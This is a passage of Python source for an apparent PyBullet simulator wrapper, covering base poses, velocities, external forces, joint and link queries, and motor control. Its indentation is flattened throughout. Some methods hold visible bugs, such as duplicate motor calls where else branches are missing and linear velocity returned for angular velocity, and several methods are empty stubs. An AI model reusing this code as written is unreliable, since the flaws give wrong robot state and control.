"""
pos, orientation = self.sim.getBasePositionAndOrientation(body_id)
return np.asarray(pos), np.asarray(orientation)
def get_base_position(self, body_id):
"""
Return the base position of the specified body.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[3]]: base position.
"""
return self.get_base_pose(body_id)[0]
def get_base_orientation(self, body_id):
"""
Get the base orientation of the specified body.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[4]]: base orientation in the form of a quaternion (x,y,z,w)
"""
return self.get_base_pose(body_id)[1]
def reset_base_pose(self, body_id, position, orientation):
"""
Reset the base position and orientation of the specified object id.
"It is best only to do this at the start, and not during a running simulation, since the command will override
the effect of all physics simulation. The linear and angular velocity is set to zero. You can use
`reset_base_velocity` to reset to a non-zero linear and/or angular velocity." [1]
Args:
body_id (int): unique object id.
position (np.array[float[3]]): new base position.
orientation (np.array[float[4]]): new base orientation (expressed as a quaternion [x,y,z,w])
"""
self.sim.resetBasePositionAndOrientation(body_id, position, orientation)
def reset_base_position(self, body_id, position):
"""
Reset the base position of the specified body/object id while preserving its orientation.
Args:
body_id (int): unique object id.
position (np.array[float[3]]): new base position.
"""
orientation = self.get_base_orientation(body_id)
self.reset_base_pose(body_id, position, orientation)
def reset_base_orientation(self, body_id, orientation):
"""
Reset the base orientation of the specified body/object id while preserving its position.
Args:
body_id (int): unique object id.
orientation (np.array[float[4]]): new base orientation (expressed as a quaternion [x,y,z,w])
"""
position = self.get_base_position(body_id)
self.reset_base_pose(body_id, position, orientation)
def get_base_velocity(self, body_id):
"""
Return the base linear and angular velocities.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[3]]: linear velocity of the base in Cartesian world space coordinates
np.array[float[3]]: angular velocity of the base in Cartesian world space coordinates
"""
lin_vel, ang_vel = self.sim.getBaseVelocity(body_id)
return np.asarray(lin_vel), np.asarray(ang_vel)
def get_base_linear_velocity(self, body_id):
"""
Return the linear velocity of the base.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[3]]: linear velocity of the base in Cartesian world space coordinates
"""
return self.get_base_velocity(body_id)[0]
def get_base_angular_velocity(self, body_id):
"""
Return the angular velocity of the base.
Args:
body_id (int): object unique id, as returned from `load_urdf`.
Returns:
np.array[float[3]]: angular velocity of the base in Cartesian world space coordinates
"""
return self.get_base_velocity(body_id)[1]
def reset_base_velocity(self, body_id, linear_velocity=None, angular_velocity=None):
"""
Reset the base velocity.
Args:
body_id (int): unique object id.
linear_velocity (np.array[float[3]]): new linear velocity of the base.
angular_velocity (np.array[float[3]]): new angular velocity of the base.
"""
if linear_velocity is not None and angular_velocity is not None:
self.sim.resetBaseVelocity(body_id, linearVelocity=linear_velocity, angularVelocity=angular_velocity)
elif linear_velocity is not None:
self.sim.resetBaseVelocity(body_id, linearVelocity=linear_velocity)
elif angular_velocity is not None:
self.sim.resetBaseVelocity(body_id, angularVelocity=angular_velocity)
def reset_base_linear_velocity(self, body_id, linear_velocity):
"""
Reset the base linear velocity.
Args:
body_id (int): unique object id.
linear_velocity (np.array[float[3]]): new linear velocity of the base
"""
self.sim.resetBaseVelocity(body_id, linearVelocity=linear_velocity)
def reset_base_angular_velocity(self, body_id, angular_velocity):
"""
Reset the base angular velocity.
Args:
body_id (int): unique object id.
angular_velocity (np.array[float[3]]): new angular velocity of the base
"""
self.sim.resetBaseVelocity(body_id, angularVelocity=angular_velocity)
def apply_external_force(self, body_id, link_id=-1, force=(0., 0., 0.), position=None, frame=Simulator.LINK_FRAME):
"""
Apply the specified external force on the specified position on the body / link.
"This method will only work when explicitly stepping the simulation using stepSimulation, in other words:
setRealTimeSimulation(0). After each simulation step, the external forces are cleared to zero. If you are
using 'setRealTimeSimulation(1), apply_external_force/Torque will have undefined behavior (either 0, 1 or
multiple force/torque applications)" [1]
Args:
body_id (int): unique body id.
link_id (int): unique link id. If -1, it will be the base.
force (np.array[float[3]]): external force to be applied.
position (np.array[float[3]], None): position on the link where the force is applied. See `flags` for
coordinate systems. If None, it is the center of mass of the body (or the link if specified).
frame (int): Specify the coordinate system of force/position: either `pybullet.WORLD_FRAME` (=2) for
Cartesian world coordinates or `pybullet.LINK_FRAME` (=1) for local link coordinates.
"""
if position is None:
if frame == Simulator.WORLD_FRAME: # world frame
if link_id == -1:
position = self.get_base_pose(body_id)[0]
else:
position = self.get_link_state(body_id, link_id)[0]
else: # local frame
position = (0., 0., 0.)
self.sim.applyExternalForce(objectUniqueId=body_id, linkIndex=link_id, forceObj=force, posObj=position,
flags=frame)
def apply_external_torque(self, body_id, link_id=-1, torque=(0., 0., 0.), frame=Simulator.LINK_FRAME):
"""
Apply an external torque on a body, or a link of the body. Note that after each simulation step, the external
torques are cleared to 0.
Warnings: This does not work when using `sim.setRealTimeSimulation(1)`.
Args:
body_id (int): unique body id.
link_id (int): link id to apply the torque, if -1 it will apply the torque on the base
torque (float[3]): Cartesian torques to be applied on the body
frame (int): Specify the coordinate system of force/position: either `pybullet.WORLD_FRAME` (=2) for
Cartesian world coordinates or `pybullet.LINK_FRAME` (=1) for local link coordinates.
"""
self.sim.applyExternalTorque(objectUniqueId=body_id, linkIndex=link_id, torqueObj=torque, flags=frame)
###################
# transformations #
###################
#############################
# robots (joints and links) #
#############################
def num_joints(self, body_id):
"""
Return the total number of joints of the specified body. This is the same as calling `num_links`.
Args:
body_id (int): unique body id.
Returns:
int: number of joints with the associated body id.
"""
return self.sim.getNumJoints(body_id)
def num_actuated_joints(self, body_id):
"""
Return the total number of actuated joints associated with the given body id.
Warnings: this checks through the list of all joints each time it is called. It might be a good idea to call
this method one time and cache the actuated joint ids.
Args:
body_id (int): unique body id.
Returns:
int: number of actuated joints of the specified body.
"""
return len(self.get_actuated_joint_ids(body_id))
def num_links(self, body_id):
"""
Return the total number of links of the specified body. This is the same as calling `num_joints`.
Args:
body_id (int): unique body id.
Returns:
int: number of links with the associated body id.
"""
return self.num_joints(body_id)
def get_joint_info(self, body_id, joint_id):
"""
Return information about the given joint about the specified body.
Note that this method returns a lot of information, so specific methods have been implemented that return
only the desired information. Also, note that we do not convert the data here.
Args:
body_id (int): unique body id.
joint_id (int): joint id is included in [0..`num_joints(body_id)`].
Returns:
[0] int: the same joint id as the input parameter
[1] str: name of the joint (as specified in the URDF/SDF/etc file)
[2] int: type of the joint which implie the number of position and velocity variables.
The types include JOINT_REVOLUTE (=0), JOINT_PRISMATIC (=1), JOINT_SPHERICAL (=2),
JOINT_PLANAR (=3), and JOINT_FIXED (=4).
[3] int: q index - the first position index in the positional state variables for this body
[4] int: dq index - the first velocity index in the velocity state variables for this body
[5] int: flags (reserved)
[6] float: the joint damping value (as specified in the URDF file)
[7] float: the joint friction value (as specified in the URDF file)
[8] float: the positional lower limit for slider and revolute joints
[9] float: the positional upper limit for slider and revolute joints
[10] float: maximum force specified in URDF. Note that this value is not automatically used.
You can use maxForce in 'setJointMotorControl2'.
[11] float: maximum velocity specified in URDF. Note that this value is not used in actual
motor control commands at the moment.
[12] str: name of the link (as specified in the URDF/SDF/etc file)
[13] np.array[float[3]]: joint axis in local frame (ignored for JOINT_FIXED)
[14] np.array[float[3]]: joint position in parent frame
[15] np.array[float[4]]: joint orientation in parent frame
[16] int: parent link index, -1 for base
"""
info = list(self.sim.getJointInfo(body_id, joint_id))
info[1] = info[1] if isinstance(info[1], str) else info[1].decode("utf-8") # bytes vs str (Py2 vs Py3)
info[12] = info[12] if isinstance(info[12], str) else info[12].decode("utf-8")
info[13] = np.asarray(info[13])
info[14] = np.asarray(info[14])
info[15] = np.asarray(info[15])
return info
def get_joint_state(self, body_id, joint_id):
"""
Get the joint state.
Args:
body_id (int): body unique id as returned by `load_urdf`, etc.
joint_id (int): joint index in range [0..num_joints(body_id)]
Returns:
float: The position value of this joint.
float: The velocity value of this joint.
np.array[float[6]]: These are the joint reaction forces, if a torque sensor is enabled for this joint it is
[Fx, Fy, Fz, Mx, My, Mz]. Without torque sensor, it is [0, 0, 0, 0, 0, 0].
float: This is the motor torque applied during the last stepSimulation. Note that this only applies in
VELOCITY_CONTROL and POSITION_CONTROL. If you use TORQUE_CONTROL then the applied joint motor torque
is exactly what you provide, so there is no need to report it separately.
"""
pos, vel, forces, torque = self.sim.getJointState(body_id, joint_id)
return pos, vel, np.asarray(forces), torque
def get_joint_states(self, body_id, joint_ids):
"""
Get the joint state of the specified joints.
Args:
body_id (int): body unique id.
joint_ids (list[int]): list of joint ids.
Returns:
list:
float: The position value of this joint.
float: The velocity value of this joint.
np.array[float[6]]: These are the joint reaction forces, if a torque sensor is enabled for this joint
it is [Fx, Fy, Fz, Mx, My, Mz]. Without torque sensor, it is [0, 0, 0, 0, 0, 0].
float: This is the motor torque applied during the last `step`. Note that this only applies in
VELOCITY_CONTROL and POSITION_CONTROL. If you use TORQUE_CONTROL then the applied joint motor
torque is exactly what you provide, so there is no need to report it separately.
"""
states = list(self.sim.getJointStates(body_id, joint_ids))
for idx, state in enumerate(states):
states[idx] = list(state)
states[idx][2] = np.asarray(state[2])
return states
def reset_joint_state(self, body_id, joint_id, position, velocity=None):
"""
Reset the state of the joint. It is best only to do this at the start, while not running the simulation:
`reset_joint_state` overrides all physics simulation. Note that we only support 1-DOF motorized joints at
the moment, sliding joint or revolute joints.
Args:
body_id (int): body unique id as returned by `load_urdf`, etc.
joint_id (int): joint index in range [0..num_joints(body_id)]
position (float): the joint position (angle in radians [rad] or position [m])
velocity (float): the joint velocity (angular [rad/s] or linear velocity [m/s])
"""
if velocity is None:
self.sim.resetJointState(body_id, joint_id, position)
else:
self.sim.resetJointState(body_id, joint_id, position, velocity)
def enable_joint_force_torque_sensor(self, body_id, joint_ids, enable=True):
"""
You can enable or disable a joint force/torque sensor in each joint. Once enabled, if you perform a
`step`, the 'get_joint_state' will report the joint reaction forces in the fixed degrees of freedom: a fixed
joint will measure all 6DOF joint forces/torques. A revolute/hinge joint force/torque sensor will measure
5DOF reaction forces along all axis except the hinge axis. The applied force by a joint motor is available
in the `applied_joint_motor_torque` of `get_joint_state`.
Args:
body_id (int): body unique id as returned by `load_urdf`, etc.
joint_ids (int, int[N]): joint index in range [0..num_joints(body_id)], or list of joint ids.
enable (bool): True to enable, False to disable the force/torque sensor
"""
if isinstance(joint_ids, int):
self.sim.enableJointForceTorqueSensor(body_id, joint_ids, int(enable))
else:
for joint_id in joint_ids:
self.sim.enableJointForceTorqueSensor(body_id, joint_id, int(enable))
def set_joint_motor_control(self, body_id, joint_ids, control_mode=Simulator.POSITION_CONTROL, positions=None,
velocities=None, forces=None, kp=None, kd=None, max_velocity=None):
r"""
Set the joint motor control.
In position control:
.. math:: error = Kp (x_{des} - x) + Kd (\dot{x}_{des} - \dot{x})
In velocity control:
.. math:: error = \dot{x}_{des} - \dot{x}
Note that the maximum forces and velocities are not automatically used for the different control schemes.
"We can control a robot by setting a desired control mode for one or more joint motors. During the `step`,
the physics engine will simulate the motors to reach the given target value that can be reached within
the maximum motor forces and other constraints. Each revolute joint and prismatic joint is motorized
by default. There are 3 different motor control modes: position control, velocity control and torque control.
You can effectively disable the motor by using a force of 0. You need to disable motor in order to use direct
torque control: `set_joint_motor_control(body_id, joint_id, control_mode=pybullet.VELOCITY_CONTROL,
force=force)`"
Args:
body_id (int): body unique id.
joint_ids ((list of) int): joint/link id, or list of joint ids.
control_mode (int): POSITION_CONTROL (=2) (which is in fact CONTROL_MODE_POSITION_VELOCITY_PD),
VELOCITY_CONTROL (=0), TORQUE_CONTROL (=1) and PD_CONTROL (=3).
positions (float, np.array[float[N]]): target joint position(s) (used in POSITION_CONTROL).
velocities (float, np.array[float[N]]): target joint velocity(ies). In VELOCITY_CONTROL and
POSITION_CONTROL, the target velocity(ies) is(are) the desired velocity of the joint. Note that the
target velocity(ies) is(are) not the maximum joint velocity(ies). In PD_CONTROL and
POSITION_CONTROL/CONTROL_MODE_POSITION_VELOCITY_PD, the final target velocities are computed using:
`kp*(erp*(desiredPosition-currentPosition)/dt)+currentVelocity+kd*(m_desiredVelocity - currentVelocity)`
forces (float, list[float]): in POSITION_CONTROL and VELOCITY_CONTROL, these are the maximum motor
forces used to reach the target values. In TORQUE_CONTROL these are the forces / torques to be applied
each simulation step.
kp (float, list[float]): position (stiffness) gain(s) (used in POSITION_CONTROL).
kd (float, list[float]): velocity (damping) gain(s) (used in POSITION_CONTROL).
max_velocity (float): in POSITION_CONTROL this limits the velocity to a maximum.
"""
kwargs = {}
if isinstance(joint_ids, int):
if positions is not None:
kwargs['targetPosition'] = positions
if velocities is not None:
kwargs['targetVelocity'] = velocities
if forces is not None:
kwargs['force'] = forces
if kp is not None:
kwargs['positionGain'] = kp
if kd is not None:
kwargs['velocityGain'] = kd
if max_velocity is not None:
kwargs['maxVelocity'] = max_velocity
self.sim.setJointMotorControl2(body_id, joint_ids, controlMode=control_mode, **kwargs)
else: # joint_ids is a list
if positions is not None:
kwargs['targetPositions'] = positions
if velocities is not None:
kwargs['targetVelocities'] = velocities
if forces is not None:
if isinstance(forces, (int, float)):
forces = [forces] * len(joint_ids)
kwargs['forces'] = forces
if kp is not None:
if isinstance(kp, (int, float)):
kp = [kp] * len(joint_ids)
kwargs['positionGains'] = kp
if kd is not None:
if isinstance(kd, (int, float)):
kd = [kd] * len(joint_ids)
kwargs['velocityGains'] = kd
self.sim.setJointMotorControlArray(body_id, joint_ids, controlMode=control_mode, **kwargs)
def get_link_state(self, body_id, link_id, compute_velocity=False, compute_forward_kinematics=False):
"""
Get the state of the associated link.
Args:
body_id (int): body unique id.
link_id (int): link index.
compute_velocity (bool): If True, the Cartesian world velocity will be computed and returned.
compute_forward_kinematics (bool): if True, the Cartesian world position/orientation will be recomputed
using forward kinematics.
Returns:
np.array[float[3]]: Cartesian world position of CoM
np.array[float[4]]: Cartesian world orientation of CoM, in quaternion [x,y,z,w]
np.array[float[3]]: local position offset of inertial frame (center of mass) expressed in the URDF
link frame
np.array[float[4]]: local orientation (quaternion [x,y,z,w]) offset of the inertial frame expressed in URDF
link frame
np.array[float[3]]: world position of the URDF link frame
np.array[float[4]]: world orientation of the URDF link frame (expressed as a quaternion [x,y,z,w])
np.array[float[3]]: Cartesian world linear velocity. Only returned if `compute_velocity` is True.
np.array[float[3]]: Cartesian world angular velocity. Only returned if `compute_velocity` is True.
"""
results = self.sim.getLinkState(body_id, link_id, computeLinkVelocity=int(compute_velocity),
computeForwardKinematics=int(compute_forward_kinematics))
return [np.asarray(result) for result in results]
def get_link_states(self, body_id, link_ids, compute_velocity=False, compute_forward_kinematics=False):
"""
Get the state of the associated links.
Args:
body_id (int): body unique id.
link_ids (list[int]): list of link index.
compute_velocity (bool): If True, the Cartesian world velocity will be computed and returned.
compute_forward_kinematics (bool): if True, the Cartesian world position/orientation will be recomputed
using forward kinematics.
Returns:
list:
np.array[float[3]]: Cartesian position of CoM
np.array[float[4]]: Cartesian orientation of CoM, in quaternion [x,y,z,w]
np.array[float[3]]: local position offset of inertial frame (center of mass) expressed in the URDF
link frame
np.array[float[4]]: local orientation (quaternion [x,y,z,w]) offset of the inertial frame expressed in
URDF link frame
np.array[float[3]]: world position of the URDF link frame
np.array[float[4]]: world orientation of the URDF link frame
np.array[float[3]]: Cartesian world linear velocity. Only returned if `compute_velocity` is True.
np.array[float[3]]: Cartesian world angular velocity. Only returned if `compute_velocity` is True.
"""
return [self.get_link_state(body_id, link_id, compute_velocity, compute_forward_kinematics)
for link_id in link_ids]
def get_link_names(self, body_id, link_ids):
"""
Return the name of the given link(s).
Args:
body_id (int): unique body id.
link_ids (int, list[int]): link id, or list of link ids.
Returns:
if 1 link:
str: link name
if multiple links:
str[N]: link names
"""
if isinstance(link_ids, int):
if link_ids == -1:
return self.get_base_name(body_id)
name = self.sim.getJointInfo(body_id, link_ids)[12]
name = name if isinstance(name, str) else name.decode("utf-8") # bytes vs str (Py2 vs Py3)
return name
link_names = []
for link_id in link_ids:
if link_id == -1:
link_names.append(self.get_base_name(body_id))
else:
name = self.sim.getJointInfo(body_id, link_id)[12]
name = name if isinstance(name, str) else name.decode("utf-8") # bytes vs str (Py2 vs Py3)
link_names.append(name)
return link_names
def get_link_masses(self, body_id, link_ids):
"""
Return the mass of the given link(s).
Args:
body_id (int): unique body id.
link_ids (int, list[int]): link id, or list of link ids.
Returns:
if 1 link:
float: mass of the given link
else:
float[N]: mass of each link
"""
if isinstance(link_ids, int):
return self.sim.getDynamicsInfo(body_id, link_ids)[0]
return np.asarray([self.sim.getDynamicsInfo(body_id, link_id)[0] for link_id in link_ids])
def get_link_frames(self, body_id, link_ids):
r"""
Return the link world frame position(s) and orientation(s).
Args:
body_id (int): body id.
link_ids (int, int[N]): link id, or list of desired link ids.
Returns:
if 1 link:
np.array[float[3]]: the link frame position in the world space
np.array[float[4]]: Cartesian orientation of the link frame [x,y,z,w]
if multiple links:
np.array[float[N,3]]: link frame position of each link in world space
np.array[float[N,4]]: orientation of each link frame [x,y,z,w]
"""
if isinstance(link_ids, int):
if link_ids == -1:
return self.get_base_pose(body_id=body_id)
return self.get_link_state(body_id=body_id, link_id=link_ids)[4:6]
positions, orientations = [], []
for link_id in link_ids:
if link_id == -1:
position, orientation = self.get_base_pose(body_id)
else:
position, orientation = self.get_link_state(body_id, link_id)[4:6]
positions.append(position)
orientations.append(orientation)
return np.asarray(positions), np.asarray(orientations)
def get_link_world_positions(self, body_id, link_ids):
"""
Return the CoM position (in the Cartesian world space coordinates) of the given link(s).
Args:
body_id (int): unique body id.
link_ids (int, list[int]): link index, or list of link indices.
Returns:
if 1 link:
np.array[float[3]]: the link CoM position in the world space
if multiple links:
np.array[float[N,3]]: CoM position of each link in world space
"""
if isinstance(link_ids, int):
if link_ids == -1:
return self.get_base_position(body_id)
return np.asarray(self.sim.getLinkState(body_id, link_ids)[0])
positions = []
for link_id in link_ids:
if link_id == -1:
positions.append(self.get_base_position(body_id))
else:
positions.append(np.asarray(self.sim.getLinkState(body_id, link_id)[0]))
return np.asarray(positions)
def get_link_positions(self, body_id, link_ids):
pass
def get_link_world_orientations(self, body_id, link_ids):
"""
Return the CoM orientation (in the Cartesian world space) of the given link(s).
Args:
body_id (int): unique body id.
link_ids (int, list[int]): link index, or list of link indices.
Returns:
if 1 link:
np.array[float[4]]: Cartesian orientation of the link CoM (x,y,z,w)
if multiple links:
np.array[float[N,4]]: CoM orientation of each link (x,y,z,w)
"""
if isinstance(link_ids, int):
if link_ids == -1:
return self.get_base_orientation(body_id)
return np.asarray(self.sim.getLinkState(body_id, link_ids)[1])
orientations = []
for link_id in link_ids:
if link_id == -1:
orientations.append(self.get_base_orientation(body_id))
else:
orientations.append(np.asarray(self.sim.getLinkState(body_id, link_id)[1]))
return np.asarray(orientations)
def get_link_orientations(self, body_id, link_ids):
pass
def get_link_world_linear_velocities(self, body_id, link_ids):
"""
Return the linear velocity of the link(s) expressed in the Cartesian world space coordinates.
Args:
body_id (int): unique body id.
link_ids (int, list[int]): link index, or list of link indices.
Returns:
if 1 link:
np.array[float[3]]: linear velocity of the link in the Cartesian world space
if multiple links:
np.array[float[N,3]]: linear velocity of each link
"""
if isinstance(link_ids, int):
if link_ids == -1:
return self.get_base_linear_velocity(body_id)
return np.asarray(self.sim.getLinkState(body_id, link_ids, computeLinkVelocity=1)[6])
velocities = []
for link_id in link_ids:
if link_id == -1:
velocities.append(self.get_base_linear_velocity(body_id))
else:
velocities.append(np.asarray(self.sim.getLinkState(body_id, link_id, computeLinkVelocity=1)[6]))
return np.asarray(velocities)
def get_link_world_angular_velocities(self, body_id, link_ids):
"""
Return the angular velocity of the link(s) in the Cartesian world space coordinates.
Args:
body_id (int): unique body id.
link_ids (int, list[int]): link index, or list of link indices.
Returns:
if 1 link:
np.array[float[3]]: angular velocity of the link in the Cartesian world space
if multiple links:
np.array[float[N,3]]: angular velocity of each link
"""
if isinstance(link_ids, int):
if link_ids == -1:
return self.get_base_linear_velocity(body_id)
return np.asarray(self.sim.getLinkState(body_id, link_ids, computeLinkVelocity=1)[7])
velocities = []
for link_id in link_ids:
if link_id == -1:
velocities.append(self.get_base_linear_velocity(body_id))
else:
velocities.append(np.asarray(self.sim.getLinkState(body_id, link_id, computeLinkVelocity=1)[7]))
return np.asarray(velocities)
def get_link_world_velocities(self, body_id, link_ids):
"""
Return the linear and angular velocities (expressed in the Cartesian world space coordinates) for the given
link(s).
Args:
body_id (int): unique body id.
link_ids (int, list[int]): link index, or list of link indices.
Returns:
if 1 link:
np.array[float[6]]: linear and angular velocity of the link in the Cartesian world space
if multiple links:
np.array[float[N,6]]: linear and angular velocity of each link
"""
if isinstance(link_ids, int):
if link_ids == -1:
lin_vel, ang_vel = self.get_base_velocity(body_id)
return np.concatenate((lin_vel, ang_vel))
lin_vel, ang_vel = self.sim.getLinkState(body_id, link_ids, computeLinkVelocity=1)[6:8]
return np.asarray(lin_vel + ang_vel)
velocities = []
for link_id in link_ids:
if link_id == -1: # base link
lin_vel, ang_vel = self.get_base_velocity(body_id)
else:
lin_vel, ang_vel = self.sim.getLinkState(body_id, link_id, computeLinkVelocity=1)[6:8]
velocities.append(np.concatenate((lin_vel, ang_vel)))
return np.asarray(velocities)
def get_link_velocities(self, body_id, link_ids):
pass
def get_q_indices(self, body_id, joint_ids):
"""
Get the corresponding q index of the given joint(s).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
int: q index
if multiple joints:
np.array[int[N]]: q indices
"""
if isinstance(joint_ids, int):
return self.sim.getJointInfo(body_id, joint_ids)[3] - 7
return np.asarray([self.sim.getJointInfo(body_id, joint_id)[3] for joint_id in joint_ids]) - 7
def get_actuated_joint_ids(self, body_id):
"""
Get the actuated joint ids associated with the given body id.
Warnings: this checks through the list of all joints each time it is called. It might be a good idea to call
this method one time and cache the actuated joint ids.
Args:
body_id (int): unique body id.
Returns:
list[int]: actuated joint ids.
"""
joint_ids = []
for joint_id in range(self.num_joints(body_id)):
# Get joint info
joint = self.get_joint_info(body_id, joint_id)
if joint[2] != self.sim.JOINT_FIXED: # if not a fixed joint
joint_ids.append(joint[0])
return joint_ids
def get_joint_names(self, body_id, joint_ids):
"""
Return the name of the given joint(s).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
str: name of the joint
if multiple joints:
str[N]: name of each joint
"""
if isinstance(joint_ids, int):
name = self.sim.getJointInfo(body_id, joint_ids)[1]
name = name if isinstance(name, str) else name.decode("utf-8")
return name
names = []
for joint_id in joint_ids:
name = self.sim.getJointInfo(body_id, joint_id)[1]
name = name if isinstance(name, str) else name.decode("utf-8")
names.append(name)
return names
def get_joint_type_ids(self, body_id, joint_ids):
"""
Get the joint type ids.
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
int: joint type id.
if multiple joints: list of above
"""
if isinstance(joint_ids, int):
return self.sim.getJointInfo(body_id, joint_ids)[2]
return [self.sim.getJointInfo(body_id, joint_id)[2] for joint_id in joint_ids]
def get_joint_type_names(self, body_id, joint_ids):
"""
Get joint type names.
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
str: joint type name.
if multiple joints: list of above
"""
joint_type_names = ['revolute', 'prismatic', 'spherical', 'planar', 'fixed', 'point2point', 'gear']
if isinstance(joint_ids, int):
return joint_type_names[self.sim.getJointInfo(body_id, joint_ids)[2]]
return [joint_type_names[self.sim.getJointInfo(body_id, joint_id)[2]] for joint_id in joint_ids]
def get_joint_dampings(self, body_id, joint_ids):
"""
Get the damping coefficient of the given joint(s).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
float: damping coefficient of the given joint
if multiple joints:
np.array[float[N]]: damping coefficient for each specified joint
"""
if isinstance(joint_ids, int):
return self.sim.getJointInfo(body_id, joint_ids)[6]
return np.asarray([self.sim.getJointInfo(body_id, joint_id)[6] for joint_id in joint_ids])
def get_joint_frictions(self, body_id, joint_ids):
"""
Get the friction coefficient of the given joint(s).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
float: friction coefficient of the given joint
if multiple joints:
np.array[float[N]]: friction coefficient for each specified joint
"""
if isinstance(joint_ids, int):
return self.sim.getJointInfo(body_id, joint_ids)[7]
return np.asarray([self.sim.getJointInfo(body_id, joint_id)[7] for joint_id in joint_ids])
def get_joint_limits(self, body_id, joint_ids):
"""
Get the joint limits of the given joint(s).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
np.array[float[2]]: lower and upper limit
if multiple joints:
np.array[float[N,2]]: lower and upper limit for each specified joint
"""
if isinstance(joint_ids, int):
return np.asarray(self.sim.getJointInfo(body_id, joint_ids)[8:10])
return np.asarray([self.sim.getJointInfo(body_id, joint_id)[8:10] for joint_id in joint_ids])
def get_joint_max_forces(self, body_id, joint_ids):
"""
Get the maximum force that can be applied on the given joint(s).
Warning: Note that this is not automatically used in position, velocity, or torque control.
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
float: maximum force [N]
if multiple joints:
np.array[float[N]]: maximum force for each specified joint [N]
"""
if isinstance(joint_ids, int):
return self.sim.getJointInfo(body_id, joint_ids)[10]
return np.asarray([self.sim.getJointInfo(body_id, joint_id)[10] for joint_id in joint_ids])
def get_joint_max_velocities(self, body_id, joint_ids):
"""
Get the maximum velocity that can be applied on the given joint(s).
Warning: Note that this is not automatically used in position, velocity, or torque control.
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
float: maximum velocity [rad/s]
if multiple joints:
np.array[float[N]]: maximum velocities for each specified joint [rad/s]
"""
if isinstance(joint_ids, int):
return self.sim.getJointInfo(body_id, joint_ids)[11]
return np.asarray([self.sim.getJointInfo(body_id, joint_id)[11] for joint_id in joint_ids])
def get_joint_axes(self, body_id, joint_ids):
"""
Get the joint axis about the given joint(s).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): a joint id, or list of joint ids.
Returns:
if 1 joint:
np.array[float[3]]: joint axis
if multiple joint:
np.array[float[N,3]]: list of joint axis
"""
if isinstance(joint_ids, int):
return np.asarray(self.sim.getJointInfo(body_id, joint_ids)[-4])
return np.asarray([self.sim.getJointInfo(body_id, joint_id)[-4] for joint_id in joint_ids])
def _set_joint_positions(self, body_id, joint_ids, positions, velocities=None, kps=None, kds=None, forces=None):
"""
Set the position of the given joint(s) (using position control).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
positions (float, np.array[float[N]]): desired position, or list of desired positions [rad]
velocities (None, float, np.array[float[N]]): desired velocity, or list of desired velocities [rad/s]
kps (None, float, np.array[float[N]]): position gain(s)
kds (None, float, np.array[float[N]]): velocity gain(s)
forces (None, float, np.array[float[N]]): maximum motor force(s)/torque(s) used to reach the target values.
"""
self.set_joint_motor_control(body_id, joint_ids, control_mode=pybullet.POSITION_CONTROL, positions=positions,
velocities=velocities, forces=forces, kp=kps, kd=kds)
def _get_joint_positions(self, body_id, joint_ids):
"""
Get the position of the given joint(s).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
Returns:
if 1 joint:
float: joint position [rad]
if multiple joints:
np.array[float[N]]: joint positions [rad]
"""
if isinstance(joint_ids, int):
return self.sim.getJointState(body_id, joint_ids)[0]
return np.asarray([state[0] for state in self.sim.getJointStates(body_id, joint_ids)])
def _set_joint_velocities(self, body_id, joint_ids, velocities, max_force=None):
"""
Set the velocity of the given joint(s) (using velocity control).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
velocities (float, np.array[float[N]]): desired velocity, or list of desired velocities [rad/s]
max_force (None, float, np.array[float[N]]): maximum motor forces/torques
"""
if isinstance(joint_ids, int):
if max_force is None:
self.sim.setJointMotorControl2(body_id, joint_ids, self.sim.VELOCITY_CONTROL, targetVelocity=velocities)
self.sim.setJointMotorControl2(body_id, joint_ids, self.sim.VELOCITY_CONTROL, targetVelocity=velocities,
force=max_force)
if max_force is None:
self.sim.setJointMotorControlArray(body_id, joint_ids, self.sim.VELOCITY_CONTROL,
targetVelocities=velocities)
self.sim.setJointMotorControlArray(body_id, joint_ids, self.sim.VELOCITY_CONTROL,
targetVelocities=velocities, forces=max_force)
def _get_joint_velocities(self, body_id, joint_ids):
"""
Get the velocity of the given joint(s).
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
Returns:
if 1 joint:
float: joint velocity [rad/s]
if multiple joints:
np.array[float[N]]: joint velocities [rad/s]
"""
if isinstance(joint_ids, int):
return self.sim.getJointState(body_id, joint_ids)[1]
return np.asarray([state[1] for state in self.sim.getJointStates(body_id, joint_ids)])
def set_joint_accelerations(self, body_id, joint_ids, accelerations, q=None, dq=None):
"""
Set the acceleration of the given joint(s) (using force control). This is achieved by performing inverse
dynamic which given the joint accelerations compute the joint torques to be applied.
Args:
body_id (int): unique body id.
joint_ids (int, list[int]): joint id, or list of joint ids.
accelerations (float, np.array[float[N]]): desired joint acceleration, or list of desired joint
accelerations [rad/s^2]
q (None, list[float], float): current joint positions.
dq (None, list[float], float): current joint velocities.
"""
# check joint ids
if isinstance(joint_ids, int):
joint_ids = [joint_ids]
if isinstance(accelerations, (int, float)):
accelerations = [accelerations]
if len(accelerations) != len(joint_ids):
raise ValueError("Expecting the desired accelerations to be of the same size as the number of joints; "
"{} != {}".format(len(accelerations), len(joint_ids)))
# get position and velocities
if q is None or dq is None:
